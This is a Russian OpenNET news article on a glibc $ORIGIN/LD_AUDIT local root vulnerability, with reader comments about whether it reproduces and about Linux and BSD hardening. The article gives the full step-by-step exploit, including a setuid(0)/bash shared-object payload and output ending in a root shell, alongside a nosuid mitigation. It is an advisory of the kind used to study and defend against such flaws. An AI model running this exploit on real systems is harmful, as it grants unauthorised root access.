The OpenNET Project / Index page

[ новости/++ | форум | wiki | теги | ]

19.10.2010 14:47  В Glibc обнаружена серьезная уязвимость

В системной библиотеке GNU C Library (glibc), являющейся основой большинства Linux-дистрибутивов, обнаружена критическая уязвимость, позволяющая любому локальному пользователю получить привилегии суперпользователя. Проблема вызвана игнорированием в Glibc требования спецификации ELF по запрещению использования текущего пути к исполняемому файлу ($ORIGIN) в процессе динамического связывания программ с идентификатором смены владельца или группы (suid/sgid). Проблема проявляется в конфигурациях, в которых пользователь имеет возможность создавать жесткие ссылки в файловой системе, допускающей наличие suid-файлов.

Уязвимость протестирована в Fedora 13 и RHEL 5 / CentOS 5, другие дистрибутивы судя по всему также подвержены проблеме. Исправления пока недоступны, статус выхода обновлений в различных Linux-дистрибутивах можно наблюдать на следующих страницах: Slackware, Gentoo, Mandriva, openSUSE, CentOS, Fedora, RHEL, Debian, Ubuntu.

Проблема была известна и ранее, но разработчики Glibc считали, что эксплуатировать ее невозможно. Используя режим аудита связывания программ (LD_AUDIT) в ld.so, вкупе с подменой $ORIGIN через создание жесткой ссылки и запуском suid-программы через файловый дескриптор, удалось разработать практический метод атаки. Проверить свою систему на наличие уязвимости можно следующим способом:



Создаем произвольную директорию:

   $ mkdir /tmp/exploit

Привязываем suid-программу жесткой ссылкой в созданную директорию (при выполнении будет изменен $ORIGIN):

   $ ln /bin/ping /tmp/exploit/target

Открываем для исполняемого файла файловый дескриптор:

   $ exec 3< /tmp/exploit/target

Данный файловый дескриптор должен быть виден в пространстве /proc

   $ ls -l /proc/$$/fd/3
   lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*

Удаляем ранее созданную директорию

   $ rm -rf /tmp/exploit/

В /proc дескриптор остался, но теперь помечен как удаленный:

   $ ls -l /proc/$$/fd/3
   lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)

Заменяем директорию на специально созданный эксплоит (имя директории будет открыто через dlopen):

   $ cat > payload.c
   void __attribute__((constructor)) init()
   {
       setuid(0);
       system("/bin/bash");
   }
   ^D

   $ gcc -w -fPIC -shared -o /tmp/exploit payload.c
   $ ls -l /tmp/exploit
   -rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*

Инициируем динамическое связывание и загрузку $ORIGIN через LD_AUDIT и запуск программы по файловому дескриптору в /proc
   
   $ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
   sh-4.1# whoami
   root
   sh-4.1# id
   uid=0(root) gid=500(taviso)

В качестве временной меры защиты рекомендуются перемонтировать все доступные сторонним пользователям на запись директории в режиме nosuid (актуально только если suid-файл и доступная на запись директория присутствуют в одном дисковом разделе, например, /tmp или /home являются частью корневого раздела, так как жесткая ссылка не может быть установлена из одного дискового раздела в другой) :


   # mount -o bind /tmp /tmp
   # mount -o remount,bind,nosuid /tmp /tmp

Дополнение: Разработчики из компании Red Hat выпустили патч, устраняющий проблему в Glibc.

  1. Главная ссылка к новости (http://seclists.org/fulldisclo...)
  2. OpenNews: Ошибка в библиотеке libc привела к уязвимости большинства FTP-серверов
Лицензия: CC-BY
Тип: Проблемы безопасности
Ключевые слова: glibc, security
При перепечатке указание ссылки на opennet.ru обязательно
Обсуждение Ajax/Линейный | Раскрыть все сообщения | RSS
 
  • 1.1, KERNEL_PANIC (ok), 15:03, 19/10/2010 [ответить] [показать ветку] [···]    [к модератору]
  • –4 +/
    Оу, как страшно.
     
     
  • 2.7, follow_me (?), 15:37, 19/10/2010 [^] [ответить]    [к модератору]
  • –1 +/
    Покажи свой IP  и ты узнаешь как страшно , вернее ты и не заметишь как всё закончится ;)
     
     
  • 3.10, arcade (ok), 15:40, 19/10/2010 [^] [ответить]     [к модератору]
  • +/
    Я не замечу У меня фря и зфс, и такие глупости как один раздел под все файлы я ... весь текст скрыт [показать]
     
     
  • 4.13, User294 (ok), 15:48, 19/10/2010 [^] [ответить]    [к модератору]  
  • +16 +/
    > давно такая бага в ядре и никто не зопатчил...

    Epic, epic, epic fail!

    Hint #1: может быть, вам следует для начала научиться отличать ядро от glibc, а уже потом умничать начинать? :)
    Hint #2: в природе, кстати,  есть более чем одна реализация libc. И ряд линухов пользуется ими. Потому что ядро и либцэ - "немного" разные вещи.

     
  • 4.14, paxuser (?), 15:54, 19/10/2010 [^] [ответить]     [к модератору]  
  • –10 +/
    Бага, к сожалению, не в ядре, а в glibc Что до FreeBSD, то по наличию мер предо... весь текст скрыт [показать]
     
     
  • 5.22, butcher (ok), 16:15, 19/10/2010 [^] [ответить]     [к модератору]  
  • +3 +/
    Обоснуете Или так, ваше личное мнение ... весь текст скрыт [показать]
     
     
  • 6.33, paxuser (?), 16:40, 19/10/2010 [^] [ответить]    [к модератору]  
  • +6 +/
    >> Бага, к сожалению, не в ядре, а в glibc. Что до FreeBSD,
    >> то по наличию мер предотвращения эксплуатации уязвимостей она до сих пор
    >> находится на уровне года, эдак, 2001-го и отстаёт от NetBSD и
    >> тем более от OpenBSD.
    > Обоснуете? Или так, ваше личное мнение?

    Конечно обосную. Во FreeBSD не ни аналогов W^X, ни ASLR, ни PIE, даже возмоность сборки с SSP добавили лишь недавно. В том же CentOS всё это в той или иной мере есть (для юзерспейса). В ванильном линуксе уже реализован аналог W^X, ASLR, поддержка PIE и защита от маппинга памяти по нулевому адресу (с 2008 г.). Не говоря уже о PaX и Grsecurity, где на данный момент реализованы защиты ядра от классов уязвимостей для нескольких аппаратных архитектур, включая аналог W^X для юзерспецса (KERNEXEC), защиту от обращения по указателям на юзерспейс (UDEREF), проверки границ данных при копировании из юзерспейса в ядро (USERCOPY) и т.д.. С полным списком можете ознакомиться сами на grsecurity.net и pax.grsecurity.net + помощь в конфигураторе ядра с PaX и Grsecurity. Датировка первых реализаций PaX - 2001-2002 г. (точнее не вспомню), Grsecurity - 2003-ий год, начала аудита кода ядра и юзерспейса в OpenBSD - 96-ой год, начала включения ProPolice (SSP) - если не ошибаюсь, то 2001-ый год. В 2004-ом году (в сети есть слайды с презентации) в OpenBSD уже были W^X, аналог SSP, StackGhost (продвинутый аналог SSP для Sparc) и ASLR, в 2007-2008 г. была реализована поддержка PIE, в 2009-ом - запрет на памминг нулевого адреса. За NetBSD я не слежу, но пару-тройку лет назад они начали портировать что-то из PaX - гугль в помощь.

     
     
  • 7.100, BigHo (?), 23:07, 19/10/2010 [^] [ответить]     [к модератору]  
  • +4 +/
    W X - технология, основанная на Х-бит Если так, то она есть - ею можно пользов... весь текст скрыт [показать]
     
     
  • 8.104, PereresusNeVlezaetBuggy (ok), 00:06, 20/10/2010 [^] [ответить]     [к модератору]  
  • +2 +/
    Не обязательно именно на аппаратный бит Суть именно в принципе 171 либо запис... весь текст скрыт [показать]
     
     
  • 9.111, BigHo (?), 01:03, 20/10/2010 [^] [ответить]     [к модератору]  
  • +/
    В смысле тот, который nX AMD Xd INTEL Как его не назови, а суть одна Без его... весь текст скрыт [показать]
     
     
  • 10.112, PereresusNeVlezaetBuggy (ok), 01:42, 20/10/2010 [^] [ответить]     [к модератору]  
  • +/
    gt оверквотинг удален Тут и возникает дилемма позволять использовать потенциа... весь текст скрыт [показать]
     
     
  • 11.118, paxuser (?), 02:19, 20/10/2010 [^] [ответить]     [к модератору]  
  • –2 +/
    Вот только в PaX почему-то такой дилеммы не вознает Этот рейс кондишен связа... весь текст скрыт [показать]
     
  • 11.120, BigHo (?), 03:19, 20/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Не в курсе был про такое поведение OpenBSD Видимо серьезный тон задает фон кате... весь текст скрыт [показать]
     
  • 10.114, paxuser (?), 02:06, 20/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Существует как минимум две альтернативных, архитектурно-зависимых реализаций W X... весь текст скрыт [показать]
     
  • 9.159, User294 (ok), 17:21, 20/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Аппаратная защита надежнее программной Одно дело если проц на уровне железа exc... весь текст скрыт [показать]
     
     
  • 10.161, PereresusNeVlezaetBuggy (ok), 17:38, 20/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Вы бы хоть с предметом ознакомились сначала Ну хотя бы в Википедию заглянули, е... весь текст скрыт [показать]
     
     
  • 11.166, User294 (ok), 20:04, 20/10/2010 [^] [ответить]     [к модератору]  
  • +/
    И правда, про возможность поюзать CS чтобы сделать изоляцию я все-таки пробаклан... весь текст скрыт [показать]
     
     
  • 12.169, PereresusNeVlezaetBuggy (ok), 21:08, 20/10/2010 [^] [ответить]     [к модератору]  
  • +/
    В защищённом режиме 8212 да, CS и SS нельзя произвольно менять Думаю, в расс... весь текст скрыт [показать]
     
     
  • 13.170, paxuser (ok), 21:22, 20/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Там в одних тестах на синтетике оверхед был до 36 В других хоть и тестировалис... весь текст скрыт [показать]
     
  • 10.163, paxuser (?), 17:41, 20/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Зависит от того, что имеется ввиду под программной и под аппаратной защитой Сов... весь текст скрыт [показать]
     
     
  • 11.165, User294 (ok), 19:46, 20/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Все бы ничего, но в таковых средах, типа Java NET PHP whatever почему-то на... весь текст скрыт [показать]
     
     
  • 12.168, paxuser (ok), 20:44, 20/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Java NET PHP - это разве маргинальные языки платформы Это угодные индустрии ко... весь текст скрыт [показать]
     
  • 8.106, paxuser (?), 00:17, 20/10/2010 [^] [ответить]     [к модератору]  
  • +1 +/
    Возможно, в последних версиях FreeBSD действительно появился аналог W X, но я об... весь текст скрыт [показать]
     
     
  • 9.119, BigHo (?), 02:35, 20/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Про то и речь Только с уточнением результата - для AMD64 нормально работает В ... весь текст скрыт [показать]
     
     
  • 10.121, paxuser (?), 03:58, 20/10/2010 [^] [ответить]     [к модератору]  
  • +2 +/
    gt оверквотинг удален Да нет там никаких принципиальных различий, разница по с... весь текст скрыт [показать]
     
     
  • 11.122, paxuser (?), 04:00, 20/10/2010 [^] [ответить]    [к модератору]  
  • +/
    s/Реализация UDEREF вкратце описана/Реализация UDEREF для amd64 вкратце описана/
     
  • 11.123, paxuser (?), 04:19, 20/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Более внятное описание USERCOPY из хелпа к конфигу By saying Y here the kernel ... весь текст скрыт [показать]
     
  • 11.196, taaroa (ok), 13:14, 24/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Позвольте Вас дополнить и поправить Slo-Tech Could you please describe in few ... весь текст скрыт [показать]
     
     
  • 12.197, paxuser (ok), 22:19, 24/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Не совсем так Из интервью с самим pipacs I talked to a few friends about it a... весь текст скрыт [показать]
     
  • 8.107, paxuser (?), 00:22, 20/10/2010 [^] [ответить]    [к модератору]  
  • +/
    > Хотел бы узнать, какими ОС вы занимаетесь?

    Сейчас - Hardened Gentoo и CentOS, очень редко другие дистрибутивы. Раньше - FreeBSD, OpenBSD и винда.

     
     
  • 9.167, User294 (ok), 20:30, 20/10/2010 [^] [ответить]     [к модератору]  
  • –1 +/
    Ух ты, кажется я впервые в жизни вижу вменяемого пользователя Генту, способного ... весь текст скрыт [показать]
     
  • 5.23, mma (?), 16:16, 19/10/2010 [^] [ответить]     [к модератору]  
  • –3 +/
    Что-то вы тут фантазируете ни по одному из пунктов не согласен 1 Да фряха знач... весь текст скрыт [показать]
     
     
  • 6.37, paxuser (?), 16:46, 19/10/2010 [^] [ответить]     [к модератору]  
  • +1 +/
    Она не только локальным подвержена - пользовательские процессы наиболее подверже... весь текст скрыт [показать]
     
     
  • 7.39, тигар (ok), 16:54, 19/10/2010 [^] [ответить]     [к модератору]  
  • +1 +/
    всеже хотелось бы увидеть пример при помощи которого я удаленно подниму свои при... весь текст скрыт [показать]
     
     
  • 8.41, paxuser (?), 16:59, 19/10/2010 [^] [ответить]     [к модератору]  
  • +1 +/
    Нет, не об этом речь Но если взломщик заполучил права обычного пользователя и з... весь текст скрыт [показать]
     
     
  • 9.43, тигар (ok), 17:02, 19/10/2010 [^] [ответить]     [к модератору]  
  • +1 +/
    дак а fbsd причем или в линаксах еще где-то между вышеописанными шагами чтение... весь текст скрыт [показать]
     
     
  • 10.45, paxuser (?), 17:12, 19/10/2010 [^] [ответить]     [к модератору]  
  • +/
    В линуксе реализованы механизмы, затрудняющие и или предотвращающие экслпуатацию... весь текст скрыт [показать]
     
     
  • 11.46, paxuser (?), 17:18, 19/10/2010 [^] [ответить]     [к модератору]  
  • +1 +/
    Для ясности безопасность ванильного линукса лично я оцениваю очень низко там п... весь текст скрыт [показать]
     
  • 11.48, тигар (ok), 17:20, 19/10/2010 [^] [ответить]     [к модератору]  
  • +/
    я пытаюсь понять зачем Вы пишете наборы фраз то PaX и Grsecurity то Она не то... весь текст скрыт [показать]
     
     
  • 12.53, paxuser (?), 17:26, 19/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Нет, вы просто хамите и либо не желаете понять, либо не обладаете даже базовым п... весь текст скрыт [показать]
     
     
  • 13.58, тигар (ok), 17:45, 19/10/2010 [^] [ответить]     [к модератору]  
  • +1 +/
    знаете меня больше практика интересует Есть примеры Где посмотреть статисти... весь текст скрыт [показать]
     
     
  • 14.73, paxuser (?), 19:07, 19/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Вас не практика интересует, а некие примеры и статистика, которые в реальном мир... весь текст скрыт [показать]
     
     
  • 15.87, Добрый Аноним (?), 21:25, 19/10/2010 [^] [ответить]     [к модератору]  
  • –1 +/
    Все так и имеет место быть, и тем ни менее, в линухах рута получают чаще, чем во... весь текст скрыт [показать]
     
     
  • 16.95, paxuser (?), 22:30, 19/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Чаще или нет - меня, например, вообще не интересует Меня интересует, есть ли сп... весь текст скрыт [показать]
     
     
  • 17.130, Добрый Аноним (?), 11:41, 20/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Ну да, когда куча детей сует свой код в ядро, действительно защищаться нужно, пр... весь текст скрыт [показать]
     
  • 16.98, User294 (ok), 22:43, 19/10/2010 [^] [ответить]     [к модератору]  
  • +1 +/
    Еще один горе-аналитик Как обычно - с ТУПЫМИ ошибками Позор Интересно, а горе... весь текст скрыт [показать]
     
     
  • 17.102, paxuser (?), 23:15, 19/10/2010 [^] [ответить]    [к модератору]  
  • +/
    > Рутковской - это тоже типа защита.

    На этот счёт есть разные мнения: http://archives.neohapsis.com/archives/dailydave/2010-q3/0031.html

     
  • 17.131, Добрый Аноним (?), 11:46, 20/10/2010 [^] [ответить]     [к модератору]  
  • +/
    юзер обиделся забавно можно, с этим кто-то спорит В линуксе, сейчас, дыры н... весь текст скрыт [показать]
     
     
  • 18.141, paxuser (?), 14:28, 20/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Только в отличие от винды, у линукса уже есть стабильная, проверенная временем р... весь текст скрыт [показать]
     
     
  • 19.147, Добрый Аноним (?), 14:41, 20/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Вы же в курсе, что в винде тоже постоянно изобретают ловушки для своего кода , ... весь текст скрыт [показать]
     
     
  • 20.155, paxuser (?), 16:44, 20/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Да, и я даже в курсе, у кого они списывают свои ловушки , а также почему у них ... весь текст скрыт [показать]
     
  • 21.160, Добрый Аноним (?), 17:25, 20/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Хе, а вы мне уже начинаете нравиться ... весь текст скрыт [показать]
     
  • 18.149, User294 (ok), 15:41, 20/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Обиделся На кого Я всего лишь не понимаю зачем надо выступать с горе-аналитик... весь текст скрыт [показать]
     
     
  • 19.152, Добрый Аноним (?), 16:36, 20/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Был бы я не добрый сегодня, я бы поругался конечно , но коли я уж добрый, опущ... весь текст скрыт [показать]
     
  • 19.157, paxuser (?), 17:15, 20/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Я немного вмешаюсь, простите Спам чаще валится с десктопов, потому что их гораз... весь текст скрыт [показать]
     
     
  • 20.158, paxuser (?), 17:21, 20/10/2010 [^] [ответить]    [к модератору]  
  • +/
    s/их гораздо меньше/их гораздо больше/

     
  • 21.164, User294 (ok), 18:41, 20/10/2010 [^] [ответить]     [к модератору]  
  • +/
    0xFF Зарегались бы вы, а Тогда вы смогли бы исправлять такое путем редакт... весь текст скрыт [показать]
     
  • 16.110, blah (?), 01:01, 20/10/2010 [^] [ответить]     [к модератору]  
  • +/
    сразу видно высказывание человека, к-ый вообще не шарит в безопасности вам вы... весь текст скрыт [показать]
     
  • 15.92, тигар (ok), 22:12, 19/10/2010 [^] [ответить]     [к модератору]  
  • +/
    погодите, если я понял правильно то Вы предлагаете мне самому доказать Ваши голо... весь текст скрыт [показать]
     
     
  • 16.101, paxuser (?), 23:08, 19/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Нет, вы поняли неправильно, вернее, вы занимаетесь казуистикой, наигранно делая ... весь текст скрыт [показать]
     
  • 13.62, Аноним (62), 18:20, 19/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Вы сами то верите в то что понаписали И какие же это пользовательские процес... весь текст скрыт [показать]
     
     
  • 14.75, paxuser (?), 19:14, 19/10/2010 [^] [ответить]     [к модератору]  
  • +1 +/
    Не верю, а знаю Любые, которые обрабатывают данные из внешних, потенциально опа... весь текст скрыт [показать]
     
  • 14.86, User294 (ok), 21:10, 19/10/2010 [^] [ответить]    [к модератору]  
  • +/
    > Руки подтачите

    Yet another *EPIC* FAIL!

     
  • 13.125, kshetragia (ok), 08:10, 20/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Приведите статистику по дырам для Linux и FreeBSD для начала Быть может все эти... весь текст скрыт [показать]
     
     
  • 14.142, paxuser (?), 14:34, 20/10/2010 [^] [ответить]     [к модератору]  
  • +/
    На статистику по дырам ориентироваться бессмысленно, т к в первую очередь на ... весь текст скрыт [показать]
     
     
  • 15.180, kshetragia (ok), 04:28, 21/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Я про это и говорю Зачем городить огород раньше времени, если по факту дыры л... весь текст скрыт [показать]
     
     
  • 16.181, kshetragia (ok), 04:32, 21/10/2010 [^] [ответить]    [к модератору]  
  • +/
    Я не специалист по безопасности, но..

    kern.securelevel=2, mount / to read only - ломайте.

     
     
  • 17.183, paxuser (ok), 06:39, 21/10/2010 [^] [ответить]    [к модератору]  
  • +/
    > kern.securelevel=2, mount / to read only - ломайте.

    Озвучьте предложение на Full-Disclosure или DailyDave, оговорите достойное вознаграждение, и всё вам сломают. :)

     
  • 16.182, paxuser (ok), 06:31, 21/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Вы говорите совершенно об обратном и вдобавок питаете иллюзии о чистоте кода, ко... весь текст скрыт [показать]
     
  • 5.30, User294 (ok), 16:37, 19/10/2010 [^] [ответить]    [к модератору]  
  • +/
    А как оценивалось качество кода? По какой методике?
     
  • 5.129, QuAzI (ok), 11:17, 20/10/2010 [^] [ответить]     [к модератору]  
  • +1 +/
    Почему к сожалению Что до FreeBSD, давеча писали про http www opennet ru o... весь текст скрыт [показать]
     
     
  • 6.140, paxuser (?), 14:24, 20/10/2010 [^] [ответить]     [к модератору]  
  • –1 +/
    Потому что ядро и так дырявое дыркой больше, дыркой меньше Знаете, у меня... весь текст скрыт [показать]
     
     
  • 7.153, QuAzI (ok), 16:38, 20/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Почему на второй машине не проявилась на дырявом же ProFTPd Извините, вы выше ... весь текст скрыт [показать]
     
     
  • 8.156, paxuser (?), 16:57, 20/10/2010 [^] [ответить]     [к модератору]  
  • +1 +/
    А я откуда знаю Но уж точно не потому, что между креслом и монитором находитесь... весь текст скрыт [показать]
     
     
  • 9.171, QuAzI (ok), 23:00, 20/10/2010 [^] [ответить]     [к модератору]  
  • –2 +/
    Неа, бессовестно хамите тут как раз Вы, но очень уж уверены что именно Вы самый ... весь текст скрыт [показать]
     
     
  • 10.172, PereresusNeVlezaetBuggy (ok), 23:51, 20/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Как ламер позорный, позволю себе всё же заметить, что тов paxuser 8212 дейст... весь текст скрыт [показать]
     
     
  • 11.176, QuAzI (ok), 01:10, 21/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Пардон Человек тут на пол темы расписал, как хорош PaX и патчи для linux на осн... весь текст скрыт [показать]
     
     
  • 12.178, paxuser (ok), 01:31, 21/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Не пардон Вы до сих пор считаете, что я что-то расписывал в категориях хорошо-п... весь текст скрыт [показать]
     
     
  • 13.184, QuAzI (ok), 08:27, 21/10/2010 [^] [ответить]     [к модератору]  
  • +/
    А ничего что Grsecurity основан на PaX Это всё равно что написать PaX вместе с... весь текст скрыт [показать]
     
     
  • 14.186, paxuser (ok), 09:14, 21/10/2010 [^] [ответить]     [к модератору]  
  • +/
    зеваю Очередная несусветная глупость, уже даже почти немного смешная Логики п... весь текст скрыт [показать]
     
  • 10.173, paxuser (ok), 00:17, 21/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Где конкретно я хамил Это ваши фантазии и трусливая попытка прировнять надуманн... весь текст скрыт [показать]
     
     
  • 11.174, QuAzI (ok), 00:45, 21/10/2010 [^] [ответить]     [к модератору]  
  • +/
    А где конкретно я хамил, конкретно Вам до вашего треда о том что я хам У меня т... весь текст скрыт [показать]
     
     
  • 12.175, paxuser (ok), 01:06, 21/10/2010 [^] [ответить]     [к модератору]  
  • +/
    вы выше _орали_ про аппаратную реализацию, а аналоги использовать уже другой ... весь текст скрыт [показать]
     
     
  • 13.177, QuAzI (ok), 01:27, 21/10/2010 [^] [ответить]     [к модератору]  
  • +/
    _орали_ - а как ещё назвать тучу постов выше _давайте, расхвалите мне её тут_- ... весь текст скрыт [показать]
     
     
  • 14.179, paxuser (ok), 01:51, 21/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Высказывал мнение, аргументы, контраргументы, давал пояснения, повторял для особ... весь текст скрыт [показать]
     
     
  • 15.185, QuAzI (ok), 08:30, 21/10/2010 [^] [ответить]    [к модератору]  
  • +/
    > Знаете, у меня тоже есть дела поважнее

    Не похоже, ой не похоже.

     
     
  • 16.187, paxuser (ok), 09:14, 21/10/2010 [^] [ответить]    [к модератору]  
  • +/
    >> Знаете, у меня тоже есть дела поважнее
    > Не похоже, ой не похоже.

    Ну вам виднее, конечно. :)

     
     
  • 17.188, QuAzI (ok), 16:21, 21/10/2010 [^] [ответить]    [к модератору]  
  • +/
    Можно немножко откровения? Почему у Вас PaX даже в никнейме?
     
     
  • 18.189, paxuser (ok), 17:58, 21/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Это скорее подпись, которая звучит проще, чем grsecuser или grsecurityuser, а су... весь текст скрыт [показать]
     
  • 3.19, Аноним (-), 16:08, 19/10/2010 [^] [ответить]    [к модератору]  
  • +/
    >позволяющая любому _локальному_ пользователю получить привилегии суперпользователя

    вот так

     
  • 3.51, ы (?), 17:25, 19/10/2010 [^] [ответить]    [к модератору]  
  • –1 +/
    >Покажи свой IP  и ты узнаешь как страшно , вернее ты и не заметишь как всё закончится ;)

    Сетка класса А: 127.0.0.0/8, выбери любой из 16'777'214 айпишников.

     
  • 3.81, Аноним2 (?), 19:41, 19/10/2010 [^] [ответить]    [к модератору]  
  • +/
    Твои пинги я действительно заметить не успею.
     
     ....нить скрыта, показать (91)

  • 1.5, V (??), 15:33, 19/10/2010 [ответить] [показать ветку] [···]    [к модератору]  
  • +3 +/
    $ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
    Inconsistency detected by ld.so: dl-open.c: 266: dl_open_worker: Assertion '(call_map)->l_name[0] == '\0'' failed!
    Connection to board-gw closed.

    не судьба..

     
     
  • 2.25, h4tr3d (ok), 16:24, 19/10/2010 [^] [ответить]    [к модератору]  
  • +/
    Аналогично, это в консольке, xterm просто закрылся. может shell тоже имеет значение?
     
     
  • 3.32, Rain (??), 16:40, 19/10/2010 [^] [ответить]    [к модератору]  
  • +/
    Нет, перенаправь вывод ошибок в файл и увидишь то же самое
     
     
  • 4.151, User294 (ok), 15:49, 20/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Можно просто шелл в шелле запустить Когда чайлдовый шелл помрет, вы вывалитесь ... весь текст скрыт [показать]
     
  • 1.6, Аноним (-), 15:36, 19/10/2010 [ответить] [показать ветку] [···]    [к модератору]  
  • +2 +/
    на шаге
    $ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
    шелл упал
    дистр OpenSUSE 11.3
     
     
  • 2.83, killer1804 (??), 20:12, 19/10/2010 [^] [ответить]    [к модератору]  
  • +/
    [user0@homelinux ~]$ uname -a
    Linux homelinux 2.6.35-ARCH ....
    шел упал. аналогично
     
  • 1.8, Egres (ok), 15:38, 19/10/2010 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    $ mkdir /tmp/exploit
    $ ln /bin/ping /tmp/exploit/target
    ln: создание жесткой ссылки '/tmp/exploit/target' => '/bin/ping': Операция не позволяется

    Ubuntu 10.10, /tmp не является отдельной fs

     
     
  • 2.49, tallman (?), 17:24, 19/10/2010 [^] [ответить]     [к модератору]  
  • +/
    и в логе такая штука tail -1 var log messages Oct 19 16 17 21 machine kernel ... весь текст скрыт [показать]
     
  • 1.9, paxuser (?), 15:40, 19/10/2010 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    Кстати, в Grsecurity по умолчанию включены запреты пользователям на создание хардлинков на чужие файлы.
     
  • 1.11, Аноним (-), 15:40, 19/10/2010 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    Исправления нет - как так?!
     
     
  • 2.28, Andrey Mitrofanov (?), 16:36, 19/10/2010 [^] [ответить]    [к модератору]  
  • +/
    Заголовок, "обнаружена". Вопросы?
     
  • 1.12, bircoph (?), 15:46, 19/10/2010 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    В Gentoo у меня FEATURES="sfperms", что ставит права go-r на все suid файлы.
    Так что эксплойт не работает и я в безопасности )).
     
     
  • 2.15, paxuser (?), 15:57, 19/10/2010 [^] [ответить]     [к модератору]  
  • –2 +/
    У вас в Gentoo месяцами обновления безопасности не выпускаются - посмотрите хотя... весь текст скрыт [показать]
     
     
  • 3.20, Аноним (-), 16:11, 19/10/2010 [^] [ответить]    [к модератору]  
  • +2 +/
    emerge --sync по чаще делай
     
     
  • 4.24, paxuser (?), 16:20, 19/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Между прочим, emerge --sync подвержен MitM-атакам Давно перешёл на emerge-webrs... весь текст скрыт [показать]
     
     
  • 5.136, anonymous (??), 13:40, 20/10/2010 [^] [ответить]    [к модератору]  
  • –1 +/
    Паранойя головного мозга во все поля.
     
     
  • 6.143, paxuser (?), 14:36, 20/10/2010 [^] [ответить]    [к модератору]  
  • +/
    > Паранойя головного мозга во все поля.

    Блажен, кто верует, знание же преумножает скорбь. :)

     
  • 3.34, bircoph (?), 16:43, 19/10/2010 [^] [ответить]    [к модератору]  
  • +/
    Я mysql не пользуюсь, так что меня это не волнует. GLSA по критическим уязвимостям быстро выходят.
     
     
  • 4.38, paxuser (?), 16:49, 19/10/2010 [^] [ответить]     [к модератору]  
  • +/
    О скорости выхода GLSA - это вы на gentoo-security расскажите, чтобы разработчи... весь текст скрыт [показать]
     
  • 4.77, maxkit (ok), 19:18, 19/10/2010 [^] [ответить]    [к модератору]  
  • +/
    > Я mysql не пользуюсь

    Ну и аргументы.

     
  • 1.16, Толстый (ok), 16:02, 19/10/2010 [ответить] [показать ветку] [···]    [к модератору]  
  • +3 +/
    на CentOS 5 сработало!
     
  • 1.18, Аноним (-), 16:03, 19/10/2010 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    на третьем шаге уже не дает
    $ exec 3 < /tmp/exploit/target
    bash: /tmp/exploit/target: Отказано в доступе
     
     
  • 2.21, Вова (?), 16:12, 19/10/2010 [^] [ответить]    [к модератору]  
  • +1 +/
    > на третьем шаге уже не дает
    > $ exec 3 < /tmp/exploit/target
    > bash: /tmp/exploit/target: Отказано в доступе

    +1, на двух гентах пытался, дома  и на работе

     
     
  • 3.82, ozs (ok), 20:02, 19/10/2010 [^] [ответить]    [к модератору]  
  • +1 +/
    ****@***:~$ mkdir /tmp/exploit
    ****@***:~$ ln /bin/ping /tmp/exploit/target
    ****@***:~$ exec 3< /tmp/exploit/target
    bash: /tmp/exploit/target: Отказано в доступе

    На Slackware 13.1

     
     
  • 4.96, Ytch (?), 22:37, 19/10/2010 [^] [ответить]    [к модератору]  
  • +/
    По умолчанию на Zenwalk 6.4 аналогично.
    Если на /bin/ping рутом дать права на чтение и проделать все еще раз, то закрывается терминал как писали выше.
     
  • 1.26, svchost (ok), 16:29, 19/10/2010 [ответить] [показать ветку] [···]    [к модератору]  
  • –2 +/
    Насквозь дырявое ядро, если при уязвимости в какой-нибудь библиотеке можно заполучить root. Такое впечатление, что в оффтопике ядро вылизано настолько, что там нет никаких уязвимостей. По крайней мере я не знаю способов заполучить привилегии админа в давно вышедшей XP SP3 не говоря уже о семерке.
    Сильно не пинайте, но иногда такие мысли возникают.
     
     
  • 2.31, Аноним (-), 16:38, 19/10/2010 [^] [ответить]     [к модератору]  
  • +/
    Сильно не пинайте, но иногда такие мысли возникают В ХР необходимости не было п... весь текст скрыт [показать]
     
  • 2.35, name (??), 16:44, 19/10/2010 [^] [ответить]    [к модератору]  
  • +1 +/
    вирусы типа kido отлично знают, в отличие от вас.
     
